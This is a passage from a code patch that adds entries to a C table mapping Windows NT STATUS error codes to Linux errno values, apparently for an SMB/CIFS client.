++	{STATUS_SXS_RELEASE_ACTIVATION_CONTEXT, -EIO,
++	"STATUS_SXS_RELEASE_ACTIVATION_CONTEXT"},
++	{STATUS_RECOVERY_NOT_NEEDED, -EIO, "STATUS_RECOVERY_NOT_NEEDED"},
++	{STATUS_RM_ALREADY_STARTED, -EIO, "STATUS_RM_ALREADY_STARTED"},
++	{STATUS_LOG_NO_RESTART, -EIO, "STATUS_LOG_NO_RESTART"},
++	{STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST, -EIO,
++	"STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST"},
++	{STATUS_GRAPHICS_PARTIAL_DATA_POPULATED, -EIO,
++	"STATUS_GRAPHICS_PARTIAL_DATA_POPULATED"},
++	{STATUS_GRAPHICS_DRIVER_MISMATCH, -EIO,
++	"STATUS_GRAPHICS_DRIVER_MISMATCH"},
++	{STATUS_GRAPHICS_MODE_NOT_PINNED, -EIO,
++	"STATUS_GRAPHICS_MODE_NOT_PINNED"},
++	{STATUS_GRAPHICS_NO_PREFERRED_MODE, -EIO,
++	"STATUS_GRAPHICS_NO_PREFERRED_MODE"},
++	{STATUS_GRAPHICS_DATASET_IS_EMPTY, -EIO,
++	"STATUS_GRAPHICS_DATASET_IS_EMPTY"},
++	{STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET, -EIO,
++	"STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET"},
++	{STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED, -EIO,
++	"STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED"},
++	{STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS, -EIO,
++	"STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS"},
++	{STATUS_GRAPHICS_LEADLINK_START_DEFERRED, -EIO,
++	"STATUS_GRAPHICS_LEADLINK_START_DEFERRED"},
++	{STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY, -EIO,
++	"STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY"},
++	{STATUS_GRAPHICS_START_DEFERRED, -EIO,
++	"STATUS_GRAPHICS_START_DEFERRED"},
++	{STATUS_NDIS_INDICATION_REQUIRED, -EIO,
++	"STATUS_NDIS_INDICATION_REQUIRED"},
++	{STATUS_GUARD_PAGE_VIOLATION, -EIO, "STATUS_GUARD_PAGE_VIOLATION"},
++	{STATUS_DATATYPE_MISALIGNMENT, -EIO, "STATUS_DATATYPE_MISALIGNMENT"},
++	{STATUS_BREAKPOINT, -EIO, "STATUS_BREAKPOINT"},
++	{STATUS_SINGLE_STEP, -EIO, "STATUS_SINGLE_STEP"},
++	{STATUS_BUFFER_OVERFLOW, -E2BIG, "STATUS_BUFFER_OVERFLOW"},
++	{STATUS_NO_MORE_FILES, -ENODATA, "STATUS_NO_MORE_FILES"},
++	{STATUS_WAKE_SYSTEM_DEBUGGER, -EIO, "STATUS_WAKE_SYSTEM_DEBUGGER"},
++	{STATUS_HANDLES_CLOSED, -EIO, "STATUS_HANDLES_CLOSED"},
++	{STATUS_NO_INHERITANCE, -EIO, "STATUS_NO_INHERITANCE"},
++	{STATUS_GUID_SUBSTITUTION_MADE, -EIO, "STATUS_GUID_SUBSTITUTION_MADE"},
++	{STATUS_PARTIAL_COPY, -EIO, "STATUS_PARTIAL_COPY"},
++	{STATUS_DEVICE_PAPER_EMPTY, -EIO, "STATUS_DEVICE_PAPER_EMPTY"},
++	{STATUS_DEVICE_POWERED_OFF, -EIO, "STATUS_DEVICE_POWERED_OFF"},
++	{STATUS_DEVICE_OFF_LINE, -EIO, "STATUS_DEVICE_OFF_LINE"},
++	{STATUS_DEVICE_BUSY, -EBUSY, "STATUS_DEVICE_BUSY"},
++	{STATUS_NO_MORE_EAS, -EIO, "STATUS_NO_MORE_EAS"},
++	{STATUS_INVALID_EA_NAME, -EINVAL, "STATUS_INVALID_EA_NAME"},
++	{STATUS_EA_LIST_INCONSISTENT, -EIO, "STATUS_EA_LIST_INCONSISTENT"},
++	{STATUS_INVALID_EA_FLAG, -EINVAL, "STATUS_INVALID_EA_FLAG"},
++	{STATUS_VERIFY_REQUIRED, -EIO, "STATUS_VERIFY_REQUIRED"},
++	{STATUS_EXTRANEOUS_INFORMATION, -EIO, "STATUS_EXTRANEOUS_INFORMATION"},
++	{STATUS_RXACT_COMMIT_NECESSARY, -EIO, "STATUS_RXACT_COMMIT_NECESSARY"},
++	{STATUS_NO_MORE_ENTRIES, -EIO, "STATUS_NO_MORE_ENTRIES"},
++	{STATUS_FILEMARK_DETECTED, -EIO, "STATUS_FILEMARK_DETECTED"},
++	{STATUS_MEDIA_CHANGED, -EIO, "STATUS_MEDIA_CHANGED"},
++	{STATUS_BUS_RESET, -EIO, "STATUS_BUS_RESET"},
++	{STATUS_END_OF_MEDIA, -EIO, "STATUS_END_OF_MEDIA"},
++	{STATUS_BEGINNING_OF_MEDIA, -EIO, "STATUS_BEGINNING_OF_MEDIA"},
++	{STATUS_MEDIA_CHECK, -EIO, "STATUS_MEDIA_CHECK"},
++	{STATUS_SETMARK_DETECTED, -EIO, "STATUS_SETMARK_DETECTED"},
++	{STATUS_NO_DATA_DETECTED, -EIO, "STATUS_NO_DATA_DETECTED"},
++	{STATUS_REDIRECTOR_HAS_OPEN_HANDLES, -EIO,
++	"STATUS_REDIRECTOR_HAS_OPEN_HANDLES"},
++	{STATUS_SERVER_HAS_OPEN_HANDLES, -EIO,
++	"STATUS_SERVER_HAS_OPEN_HANDLES"},
++	{STATUS_ALREADY_DISCONNECTED, -EIO, "STATUS_ALREADY_DISCONNECTED"},
++	{STATUS_LONGJUMP, -EIO, "STATUS_LONGJUMP"},
++	{STATUS_CLEANER_CARTRIDGE_INSTALLED, -EIO,
++	"STATUS_CLEANER_CARTRIDGE_INSTALLED"},
++	{STATUS_PLUGPLAY_QUERY_VETOED, -EIO, "STATUS_PLUGPLAY_QUERY_VETOED"},
++	{STATUS_UNWIND_CONSOLIDATE, -EIO, "STATUS_UNWIND_CONSOLIDATE"},
++	{STATUS_REGISTRY_HIVE_RECOVERED, -EIO,
++	"STATUS_REGISTRY_HIVE_RECOVERED"},
++	{STATUS_DLL_MIGHT_BE_INSECURE, -EIO, "STATUS_DLL_MIGHT_BE_INSECURE"},
++	{STATUS_DLL_MIGHT_BE_INCOMPATIBLE, -EIO,
++	"STATUS_DLL_MIGHT_BE_INCOMPATIBLE"},
++	{STATUS_STOPPED_ON_SYMLINK, -EOPNOTSUPP, "STATUS_STOPPED_ON_SYMLINK"},
++	{STATUS_IO_REPARSE_TAG_NOT_HANDLED, -EOPNOTSUPP,
++	"STATUS_REPARSE_NOT_HANDLED"},
++	{STATUS_DEVICE_REQUIRES_CLEANING, -EIO,
++	"STATUS_DEVICE_REQUIRES_CLEANING"},
++	{STATUS_DEVICE_DOOR_OPEN, -EIO, "STATUS_DEVICE_DOOR_OPEN"},
++	{STATUS_DATA_LOST_REPAIR, -EIO, "STATUS_DATA_LOST_REPAIR"},
++	{DBG_EXCEPTION_NOT_HANDLED, -EIO, "DBG_EXCEPTION_NOT_HANDLED"},
++	{STATUS_CLUSTER_NODE_ALREADY_UP, -EIO,
++	"STATUS_CLUSTER_NODE_ALREADY_UP"},
++	{STATUS_CLUSTER_NODE_ALREADY_DOWN, -EIO,
++	"STATUS_CLUSTER_NODE_ALREADY_DOWN"},
++	{STATUS_CLUSTER_NETWORK_ALREADY_ONLINE, -EIO,
++	"STATUS_CLUSTER_NETWORK_ALREADY_ONLINE"},
++	{STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE, -EIO,
++	"STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE"},
++	{STATUS_CLUSTER_NODE_ALREADY_MEMBER, -EIO,
++	"STATUS_CLUSTER_NODE_ALREADY_MEMBER"},
++	{STATUS_COULD_NOT_RESIZE_LOG, -EIO, "STATUS_COULD_NOT_RESIZE_LOG"},
++	{STATUS_NO_TXF_METADATA, -EIO, "STATUS_NO_TXF_METADATA"},
++	{STATUS_CANT_RECOVER_WITH_HANDLE_OPEN, -EIO,
++	"STATUS_CANT_RECOVER_WITH_HANDLE_OPEN"},
++	{STATUS_TXF_METADATA_ALREADY_PRESENT, -EIO,
++	"STATUS_TXF_METADATA_ALREADY_PRESENT"},
++	{STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET, -EIO,
++	"STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET"},
++	{STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED, -EIO,
++	"STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED"},
++	{STATUS_FLT_BUFFER_TOO_SMALL, -ENOBUFS, "STATUS_FLT_BUFFER_TOO_SMALL"},
++	{STATUS_FVE_PARTIAL_METADATA, -EIO, "STATUS_FVE_PARTIAL_METADATA"},
++	{STATUS_UNSUCCESSFUL, -EIO, "STATUS_UNSUCCESSFUL"},
++	{STATUS_NOT_IMPLEMENTED, -EOPNOTSUPP, "STATUS_NOT_IMPLEMENTED"},
++	{STATUS_INVALID_INFO_CLASS, -EIO, "STATUS_INVALID_INFO_CLASS"},
++	{STATUS_INFO_LENGTH_MISMATCH, -EIO, "STATUS_INFO_LENGTH_MISMATCH"},
++	{STATUS_ACCESS_VIOLATION, -EACCES, "STATUS_ACCESS_VIOLATION"},
++	{STATUS_IN_PAGE_ERROR, -EFAULT, "STATUS_IN_PAGE_ERROR"},
++	{STATUS_PAGEFILE_QUOTA, -EDQUOT, "STATUS_PAGEFILE_QUOTA"},
++	{STATUS_INVALID_HANDLE, -EBADF, "STATUS_INVALID_HANDLE"},
++	{STATUS_BAD_INITIAL_STACK, -EIO, "STATUS_BAD_INITIAL_STACK"},
++	{STATUS_BAD_INITIAL_PC, -EIO, "STATUS_BAD_INITIAL_PC"},
++	{STATUS_INVALID_CID, -EIO, "STATUS_INVALID_CID"},
++	{STATUS_TIMER_NOT_CANCELED, -EIO, "STATUS_TIMER_NOT_CANCELED"},
++	{STATUS_INVALID_PARAMETER, -EINVAL, "STATUS_INVALID_PARAMETER"},
++	{STATUS_NO_SUCH_DEVICE, -ENODEV, "STATUS_NO_SUCH_DEVICE"},
++	{STATUS_NO_SUCH_FILE, -ENOENT, "STATUS_NO_SUCH_FILE"},
++	{STATUS_INVALID_DEVICE_REQUEST, -EOPNOTSUPP, "STATUS_INVALID_DEVICE_REQUEST"},
++	{STATUS_END_OF_FILE, -ENODATA, "STATUS_END_OF_FILE"},
++	{STATUS_WRONG_VOLUME, -EIO, "STATUS_WRONG_VOLUME"},
++	{STATUS_NO_MEDIA_IN_DEVICE, -EIO, "STATUS_NO_MEDIA_IN_DEVICE"},
++	{STATUS_UNRECOGNIZED_MEDIA, -EIO, "STATUS_UNRECOGNIZED_MEDIA"},
++	{STATUS_NONEXISTENT_SECTOR, -EIO, "STATUS_NONEXISTENT_SECTOR"},
++	{STATUS_MORE_PROCESSING_REQUIRED, -EIO,
++	"STATUS_MORE_PROCESSING_REQUIRED"},
++	{STATUS_NO_MEMORY, -EREMOTEIO, "STATUS_NO_MEMORY"},
++	{STATUS_CONFLICTING_ADDRESSES, -EADDRINUSE,
++	"STATUS_CONFLICTING_ADDRESSES"},
++	{STATUS_NOT_MAPPED_VIEW, -EIO, "STATUS_NOT_MAPPED_VIEW"},
++	{STATUS_UNABLE_TO_FREE_VM, -EIO, "STATUS_UNABLE_TO_FREE_VM"},
++	{STATUS_UNABLE_TO_DELETE_SECTION, -EIO,
++	"STATUS_UNABLE_TO_DELETE_SECTION"},
++	{STATUS_INVALID_SYSTEM_SERVICE, -EIO, "STATUS_INVALID_SYSTEM_SERVICE"},
++	{STATUS_ILLEGAL_INSTRUCTION, -EIO, "STATUS_ILLEGAL_INSTRUCTION"},
++	{STATUS_INVALID_LOCK_SEQUENCE, -EIO, "STATUS_INVALID_LOCK_SEQUENCE"},
++	{STATUS_INVALID_VIEW_SIZE, -EIO, "STATUS_INVALID_VIEW_SIZE"},
++	{STATUS_INVALID_FILE_FOR_SECTION, -EIO,
++	"STATUS_INVALID_FILE_FOR_SECTION"},
++	{STATUS_ALREADY_COMMITTED, -EIO, "STATUS_ALREADY_COMMITTED"},
++	{STATUS_ACCESS_DENIED, -EACCES, "STATUS_ACCESS_DENIED"},
++	{STATUS_BUFFER_TOO_SMALL, -EIO, "STATUS_BUFFER_TOO_SMALL"},
++	{STATUS_OBJECT_TYPE_MISMATCH, -EIO, "STATUS_OBJECT_TYPE_MISMATCH"},
++	{STATUS_NONCONTINUABLE_EXCEPTION, -EIO,
++	"STATUS_NONCONTINUABLE_EXCEPTION"},
++	{STATUS_INVALID_DISPOSITION, -EIO, "STATUS_INVALID_DISPOSITION"},
++	{STATUS_UNWIND, -EIO, "STATUS_UNWIND"},
++	{STATUS_BAD_STACK, -EIO, "STATUS_BAD_STACK"},
++	{STATUS_INVALID_UNWIND_TARGET, -EIO, "STATUS_INVALID_UNWIND_TARGET"},
++	{STATUS_NOT_LOCKED, -EIO, "STATUS_NOT_LOCKED"},
++	{STATUS_PARITY_ERROR, -EIO, "STATUS_PARITY_ERROR"},
++	{STATUS_UNABLE_TO_DECOMMIT_VM, -EIO, "STATUS_UNABLE_TO_DECOMMIT_VM"},
++	{STATUS_NOT_COMMITTED, -EIO, "STATUS_NOT_COMMITTED"},
++	{STATUS_INVALID_PORT_ATTRIBUTES, -EIO,
++	"STATUS_INVALID_PORT_ATTRIBUTES"},
++	{STATUS_PORT_MESSAGE_TOO_LONG, -EIO, "STATUS_PORT_MESSAGE_TOO_LONG"},
++	{STATUS_INVALID_PARAMETER_MIX, -EINVAL, "STATUS_INVALID_PARAMETER_MIX"},
++	{STATUS_INVALID_QUOTA_LOWER, -EIO, "STATUS_INVALID_QUOTA_LOWER"},
++	{STATUS_DISK_CORRUPT_ERROR, -EIO, "STATUS_DISK_CORRUPT_ERROR"},
++	{STATUS_OBJECT_NAME_INVALID, -ENOENT, "STATUS_OBJECT_NAME_INVALID"},
++	{STATUS_OBJECT_NAME_NOT_FOUND, -ENOENT, "STATUS_OBJECT_NAME_NOT_FOUND"},
++	{STATUS_OBJECT_NAME_COLLISION, -EEXIST, "STATUS_OBJECT_NAME_COLLISION"},
++	{STATUS_PORT_DISCONNECTED, -EIO, "STATUS_PORT_DISCONNECTED"},
++	{STATUS_DEVICE_ALREADY_ATTACHED, -EIO,
++	"STATUS_DEVICE_ALREADY_ATTACHED"},
++	{STATUS_OBJECT_PATH_INVALID, -ENOTDIR, "STATUS_OBJECT_PATH_INVALID"},
++	{STATUS_OBJECT_PATH_NOT_FOUND, -ENOENT, "STATUS_OBJECT_PATH_NOT_FOUND"},
++	{STATUS_OBJECT_PATH_SYNTAX_BAD, -EIO, "STATUS_OBJECT_PATH_SYNTAX_BAD"},
++	{STATUS_DATA_OVERRUN, -EIO, "STATUS_DATA_OVERRUN"},
++	{STATUS_DATA_LATE_ERROR, -EIO, "STATUS_DATA_LATE_ERROR"},
++	{STATUS_DATA_ERROR, -EIO, "STATUS_DATA_ERROR"},
++	{STATUS_CRC_ERROR, -EIO, "STATUS_CRC_ERROR"},
++	{STATUS_SECTION_TOO_BIG, -EIO, "STATUS_SECTION_TOO_BIG"},
++	{STATUS_PORT_CONNECTION_REFUSED, -ECONNREFUSED,
++	"STATUS_PORT_CONNECTION_REFUSED"},
++	{STATUS_INVALID_PORT_HANDLE, -EIO, "STATUS_INVALID_PORT_HANDLE"},
++	{STATUS_SHARING_VIOLATION, -EBUSY, "STATUS_SHARING_VIOLATION"},
++	{STATUS_QUOTA_EXCEEDED, -EDQUOT, "STATUS_QUOTA_EXCEEDED"},
++	{STATUS_INVALID_PAGE_PROTECTION, -EIO,
++	"STATUS_INVALID_PAGE_PROTECTION"},
++	{STATUS_MUTANT_NOT_OWNED, -EIO, "STATUS_MUTANT_NOT_OWNED"},
++	{STATUS_SEMAPHORE_LIMIT_EXCEEDED, -EIO,
++	"STATUS_SEMAPHORE_LIMIT_EXCEEDED"},
++	{STATUS_PORT_ALREADY_SET, -EIO, "STATUS_PORT_ALREADY_SET"},
++	{STATUS_SECTION_NOT_IMAGE, -EIO, "STATUS_SECTION_NOT_IMAGE"},
++	{STATUS_SUSPEND_COUNT_EXCEEDED, -EIO, "STATUS_SUSPEND_COUNT_EXCEEDED"},
++	{STATUS_THREAD_IS_TERMINATING, -EIO, "STATUS_THREAD_IS_TERMINATING"},
++	{STATUS_BAD_WORKING_SET_LIMIT, -EIO, "STATUS_BAD_WORKING_SET_LIMIT"},
++	{STATUS_INCOMPATIBLE_FILE_MAP, -EIO, "STATUS_INCOMPATIBLE_FILE_MAP"},
++	{STATUS_SECTION_PROTECTION, -EIO, "STATUS_SECTION_PROTECTION"},
++	{STATUS_EAS_NOT_SUPPORTED, -EOPNOTSUPP, "STATUS_EAS_NOT_SUPPORTED"},
++	{STATUS_EA_TOO_LARGE, -EIO, "STATUS_EA_TOO_LARGE"},
++	{STATUS_NONEXISTENT_EA_ENTRY, -EIO, "STATUS_NONEXISTENT_EA_ENTRY"},
++	{STATUS_NO_EAS_ON_FILE, -ENODATA, "STATUS_NO_EAS_ON_FILE"},
++	{STATUS_EA_CORRUPT_ERROR, -EIO, "STATUS_EA_CORRUPT_ERROR"},
++	{STATUS_FILE_LOCK_CONFLICT, -EACCES, "STATUS_FILE_LOCK_CONFLICT"},
++	{STATUS_LOCK_NOT_GRANTED, -EACCES, "STATUS_LOCK_NOT_GRANTED"},
++	{STATUS_DELETE_PENDING, -ENOENT, "STATUS_DELETE_PENDING"},
++	{STATUS_CTL_FILE_NOT_SUPPORTED, -ENOSYS,
++	"STATUS_CTL_FILE_NOT_SUPPORTED"},
++	{STATUS_UNKNOWN_REVISION, -EIO, "STATUS_UNKNOWN_REVISION"},
++	{STATUS_REVISION_MISMATCH, -EIO, "STATUS_REVISION_MISMATCH"},
++	{STATUS_INVALID_OWNER, -EIO, "STATUS_INVALID_OWNER"},
++	{STATUS_INVALID_PRIMARY_GROUP, -EIO, "STATUS_INVALID_PRIMARY_GROUP"},
++	{STATUS_NO_IMPERSONATION_TOKEN, -EIO, "STATUS_NO_IMPERSONATION_TOKEN"},
++	{STATUS_CANT_DISABLE_MANDATORY, -EIO, "STATUS_CANT_DISABLE_MANDATORY"},
++	{STATUS_NO_LOGON_SERVERS, -EIO, "STATUS_NO_LOGON_SERVERS"},
++	{STATUS_NO_SUCH_LOGON_SESSION, -EIO, "STATUS_NO_SUCH_LOGON_SESSION"},
++	{STATUS_NO_SUCH_PRIVILEGE, -EIO, "STATUS_NO_SUCH_PRIVILEGE"},
++	{STATUS_PRIVILEGE_NOT_HELD, -EIO, "STATUS_PRIVILEGE_NOT_HELD"},
++	{STATUS_INVALID_ACCOUNT_NAME, -EIO, "STATUS_INVALID_ACCOUNT_NAME"},
++	{STATUS_USER_EXISTS, -EIO, "STATUS_USER_EXISTS"},
++	{STATUS_NO_SUCH_USER, -EIO, "STATUS_NO_SUCH_USER"},
++	{STATUS_GROUP_EXISTS, -EIO, "STATUS_GROUP_EXISTS"},
++	{STATUS_NO_SUCH_GROUP, -EIO, "STATUS_NO_SUCH_GROUP"},
++	{STATUS_MEMBER_IN_GROUP, -EIO, "STATUS_MEMBER_IN_GROUP"},
++	{STATUS_MEMBER_NOT_IN_GROUP, -EIO, "STATUS_MEMBER_NOT_IN_GROUP"},
++	{STATUS_LAST_ADMIN, -EIO, "STATUS_LAST_ADMIN"},
++	{STATUS_WRONG_PASSWORD, -EACCES, "STATUS_WRONG_PASSWORD"},
++	{STATUS_ILL_FORMED_PASSWORD, -EINVAL, "STATUS_ILL_FORMED_PASSWORD"},
++	{STATUS_PASSWORD_RESTRICTION, -EACCES, "STATUS_PASSWORD_RESTRICTION"},
++	{STATUS_LOGON_FAILURE, -EACCES, "STATUS_LOGON_FAILURE"},
++	{STATUS_ACCOUNT_RESTRICTION, -EACCES, "STATUS_ACCOUNT_RESTRICTION"},
++	{STATUS_INVALID_LOGON_HOURS, -EACCES, "STATUS_INVALID_LOGON_HOURS"},
++	{STATUS_INVALID_WORKSTATION, -EACCES, "STATUS_INVALID_WORKSTATION"},
++	{STATUS_PASSWORD_EXPIRED, -EKEYEXPIRED, "STATUS_PASSWORD_EXPIRED"},
++	{STATUS_ACCOUNT_DISABLED, -EKEYREVOKED, "STATUS_ACCOUNT_DISABLED"},
++	{STATUS_NONE_MAPPED, -EIO, "STATUS_NONE_MAPPED"},
++	{STATUS_TOO_MANY_LUIDS_REQUESTED, -EIO,
++	"STATUS_TOO_MANY_LUIDS_REQUESTED"},
++	{STATUS_LUIDS_EXHAUSTED, -EIO, "STATUS_LUIDS_EXHAUSTED"},
++	{STATUS_INVALID_SUB_AUTHORITY, -EIO, "STATUS_INVALID_SUB_AUTHORITY"},
++	{STATUS_INVALID_ACL, -EIO, "STATUS_INVALID_ACL"},
++	{STATUS_INVALID_SID, -EIO, "STATUS_INVALID_SID"},
++	{STATUS_INVALID_SECURITY_DESCR, -EIO, "STATUS_INVALID_SECURITY_DESCR"},
++	{STATUS_PROCEDURE_NOT_FOUND, -EIO, "STATUS_PROCEDURE_NOT_FOUND"},
++	{STATUS_INVALID_IMAGE_FORMAT, -EIO, "STATUS_INVALID_IMAGE_FORMAT"},
++	{STATUS_NO_TOKEN, -EIO, "STATUS_NO_TOKEN"},
++	{STATUS_BAD_INHERITANCE_ACL, -EIO, "STATUS_BAD_INHERITANCE_ACL"},
++	{STATUS_RANGE_NOT_LOCKED, -EIO, "STATUS_RANGE_NOT_LOCKED"},
++	{STATUS_DISK_FULL, -ENOSPC, "STATUS_DISK_FULL"},
++	{STATUS_SERVER_DISABLED, -EIO, "STATUS_SERVER_DISABLED"},
++	{STATUS_SERVER_NOT_DISABLED, -EIO, "STATUS_SERVER_NOT_DISABLED"},
++	{STATUS_TOO_MANY_GUIDS_REQUESTED, -EIO,
++	"STATUS_TOO_MANY_GUIDS_REQUESTED"},
++	{STATUS_GUIDS_EXHAUSTED, -EIO, "STATUS_GUIDS_EXHAUSTED"},
++	{STATUS_INVALID_ID_AUTHORITY, -EIO, "STATUS_INVALID_ID_AUTHORITY"},
++	{STATUS_AGENTS_EXHAUSTED, -EIO, "STATUS_AGENTS_EXHAUSTED"},
++	{STATUS_INVALID_VOLUME_LABEL, -EIO, "STATUS_INVALID_VOLUME_LABEL"},
++	{STATUS_SECTION_NOT_EXTENDED, -EIO, "STATUS_SECTION_NOT_EXTENDED"},
++	{STATUS_NOT_MAPPED_DATA, -EIO, "STATUS_NOT_MAPPED_DATA"},
++	{STATUS_RESOURCE_DATA_NOT_FOUND, -EIO,
++	"STATUS_RESOURCE_DATA_NOT_FOUND"},
++	{STATUS_RESOURCE_TYPE_NOT_FOUND, -EIO,
++	"STATUS_RESOURCE_TYPE_NOT_FOUND"},
++	{STATUS_RESOURCE_NAME_NOT_FOUND, -EIO,
++	"STATUS_RESOURCE_NAME_NOT_FOUND"},
++	{STATUS_ARRAY_BOUNDS_EXCEEDED, -EIO, "STATUS_ARRAY_BOUNDS_EXCEEDED"},
++	{STATUS_FLOAT_DENORMAL_OPERAND, -EIO, "STATUS_FLOAT_DENORMAL_OPERAND"},
++	{STATUS_FLOAT_DIVIDE_BY_ZERO, -EIO, "STATUS_FLOAT_DIVIDE_BY_ZERO"},
++	{STATUS_FLOAT_INEXACT_RESULT, -EIO, "STATUS_FLOAT_INEXACT_RESULT"},
++	{STATUS_FLOAT_INVALID_OPERATION, -EIO,
++	"STATUS_FLOAT_INVALID_OPERATION"},
++	{STATUS_FLOAT_OVERFLOW, -EIO, "STATUS_FLOAT_OVERFLOW"},
++	{STATUS_FLOAT_STACK_CHECK, -EIO, "STATUS_FLOAT_STACK_CHECK"},
++	{STATUS_FLOAT_UNDERFLOW, -EIO, "STATUS_FLOAT_UNDERFLOW"},
++	{STATUS_INTEGER_DIVIDE_BY_ZERO, -EIO, "STATUS_INTEGER_DIVIDE_BY_ZERO"},
++	{STATUS_INTEGER_OVERFLOW, -EIO, "STATUS_INTEGER_OVERFLOW"},
++	{STATUS_PRIVILEGED_INSTRUCTION, -EIO, "STATUS_PRIVILEGED_INSTRUCTION"},
++	{STATUS_TOO_MANY_PAGING_FILES, -EIO, "STATUS_TOO_MANY_PAGING_FILES"},
++	{STATUS_FILE_INVALID, -EIO, "STATUS_FILE_INVALID"},
++	{STATUS_ALLOTTED_SPACE_EXCEEDED, -EIO,
++	"STATUS_ALLOTTED_SPACE_EXCEEDED"},
++	{STATUS_INSUFFICIENT_RESOURCES, -EAGAIN,
++				"STATUS_INSUFFICIENT_RESOURCES"},
++	{STATUS_DFS_EXIT_PATH_FOUND, -EIO, "STATUS_DFS_EXIT_PATH_FOUND"},
++	{STATUS_DEVICE_DATA_ERROR, -EIO, "STATUS_DEVICE_DATA_ERROR"},
++	{STATUS_DEVICE_NOT_CONNECTED, -EIO, "STATUS_DEVICE_NOT_CONNECTED"},
++	{STATUS_DEVICE_POWER_FAILURE, -EIO, "STATUS_DEVICE_POWER_FAILURE"},
++	{STATUS_FREE_VM_NOT_AT_BASE, -EIO, "STATUS_FREE_VM_NOT_AT_BASE"},
++	{STATUS_MEMORY_NOT_ALLOCATED, -EFAULT, "STATUS_MEMORY_NOT_ALLOCATED"},
++	{STATUS_WORKING_SET_QUOTA, -EIO, "STATUS_WORKING_SET_QUOTA"},
++	{STATUS_MEDIA_WRITE_PROTECTED, -EROFS, "STATUS_MEDIA_WRITE_PROTECTED"},
++	{STATUS_DEVICE_NOT_READY, -EIO, "STATUS_DEVICE_NOT_READY"},
++	{STATUS_INVALID_GROUP_ATTRIBUTES, -EIO,
++	"STATUS_INVALID_GROUP_ATTRIBUTES"},
++	{STATUS_BAD_IMPERSONATION_LEVEL, -EIO,
++	"STATUS_BAD_IMPERSONATION_LEVEL"},
++	{STATUS_CANT_OPEN_ANONYMOUS, -EIO, "STATUS_CANT_OPEN_ANONYMOUS"},
++	{STATUS_BAD_VALIDATION_CLASS, -EIO, "STATUS_BAD_VALIDATION_CLASS"},
++	{STATUS_BAD_TOKEN_TYPE, -EIO, "STATUS_BAD_TOKEN_TYPE"},
++	{STATUS_BAD_MASTER_BOOT_RECORD, -EIO, "STATUS_BAD_MASTER_BOOT_RECORD"},
++	{STATUS_INSTRUCTION_MISALIGNMENT, -EIO,
++	"STATUS_INSTRUCTION_MISALIGNMENT"},
++	{STATUS_INSTANCE_NOT_AVAILABLE, -EIO, "STATUS_INSTANCE_NOT_AVAILABLE"},
++	{STATUS_PIPE_NOT_AVAILABLE, -EIO, "STATUS_PIPE_NOT_AVAILABLE"},
++	{STATUS_INVALID_PIPE_STATE, -EIO, "STATUS_INVALID_PIPE_STATE"},
++	{STATUS_PIPE_BUSY, -EBUSY, "STATUS_PIPE_BUSY"},
++	{STATUS_ILLEGAL_FUNCTION, -EIO, "STATUS_ILLEGAL_FUNCTION"},
++	{STATUS_PIPE_DISCONNECTED, -EPIPE, "STATUS_PIPE_DISCONNECTED"},
++	{STATUS_PIPE_CLOSING, -EIO, "STATUS_PIPE_CLOSING"},
++	{STATUS_PIPE_CONNECTED, -EIO, "STATUS_PIPE_CONNECTED"},
++	{STATUS_PIPE_LISTENING, -EIO, "STATUS_PIPE_LISTENING"},
++	{STATUS_INVALID_READ_MODE, -EIO, "STATUS_INVALID_READ_MODE"},
++	{STATUS_IO_TIMEOUT, -EAGAIN, "STATUS_IO_TIMEOUT"},
++	{STATUS_FILE_FORCED_CLOSED, -EIO, "STATUS_FILE_FORCED_CLOSED"},
++	{STATUS_PROFILING_NOT_STARTED, -EIO, "STATUS_PROFILING_NOT_STARTED"},
++	{STATUS_PROFILING_NOT_STOPPED, -EIO, "STATUS_PROFILING_NOT_STOPPED"},
++	{STATUS_COULD_NOT_INTERPRET, -EIO, "STATUS_COULD_NOT_INTERPRET"},
++	{STATUS_FILE_IS_A_DIRECTORY, -EISDIR, "STATUS_FILE_IS_A_DIRECTORY"},
++	{STATUS_NOT_SUPPORTED, -EOPNOTSUPP, "STATUS_NOT_SUPPORTED"},
++	{STATUS_REMOTE_NOT_LISTENING, -EHOSTDOWN,
++	"STATUS_REMOTE_NOT_LISTENING"},
++	{STATUS_DUPLICATE_NAME, -ENOTUNIQ, "STATUS_DUPLICATE_NAME"},
++	{STATUS_BAD_NETWORK_PATH, -EINVAL, "STATUS_BAD_NETWORK_PATH"},
++	{STATUS_NETWORK_BUSY, -EBUSY, "STATUS_NETWORK_BUSY"},
++	{STATUS_DEVICE_DOES_NOT_EXIST, -ENODEV, "STATUS_DEVICE_DOES_NOT_EXIST"},
++	{STATUS_TOO_MANY_COMMANDS, -EIO, "STATUS_TOO_MANY_COMMANDS"},
++	{STATUS_ADAPTER_HARDWARE_ERROR, -EIO, "STATUS_ADAPTER_HARDWARE_ERROR"},
++	{STATUS_INVALID_NETWORK_RESPONSE, -EIO,
++	"STATUS_INVALID_NETWORK_RESPONSE"},
++	{STATUS_UNEXPECTED_NETWORK_ERROR, -EIO,
++	"STATUS_UNEXPECTED_NETWORK_ERROR"},
++	{STATUS_BAD_REMOTE_ADAPTER, -EIO, "STATUS_BAD_REMOTE_ADAPTER"},
++	{STATUS_PRINT_QUEUE_FULL, -EIO, "STATUS_PRINT_QUEUE_FULL"},
++	{STATUS_NO_SPOOL_SPACE, -EIO, "STATUS_NO_SPOOL_SPACE"},
++	{STATUS_PRINT_CANCELLED, -EIO, "STATUS_PRINT_CANCELLED"},
++	{STATUS_NETWORK_NAME_DELETED, -EREMCHG, "STATUS_NETWORK_NAME_DELETED"},
